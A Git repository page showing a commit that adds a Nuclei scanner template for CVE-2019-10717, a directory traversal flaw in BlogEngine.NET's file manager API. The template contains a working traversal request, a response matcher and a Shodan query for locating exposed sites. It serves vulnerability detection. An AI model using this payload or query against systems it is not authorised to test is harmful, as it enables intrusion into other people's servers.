daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2019-10717.yaml

patch-1
Arafat Ansari 2022-08-01 13:28:09 +05:30 committed by GitHub
parent c737c6c1c5
commit cc5107c81f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 34 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
cves/2021/CVE-2019-10717.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2019-10717
info:
name: BlogEngine.NET 3.3.7.0 - Directory Traversal
author: arafatansari
severity: medium
description: |
BlogEngine.NET 3.3.7.0 allows /api/filemanager Directory Traversal via the path parameter
reference:
- https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10717
metadata:
shodan-query: http.html:"Blogengine.net"
verified: "true"
tags: cve,unauthenticated,2019,lfi
requests:
- raw:
- |
GET /api/filemanager?path=%2F..%2f..%2fContent HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- '~/App_Data/files/../../([a-zA-Z0-9\.\-]+)/([a-z0-9]+)'
condition: and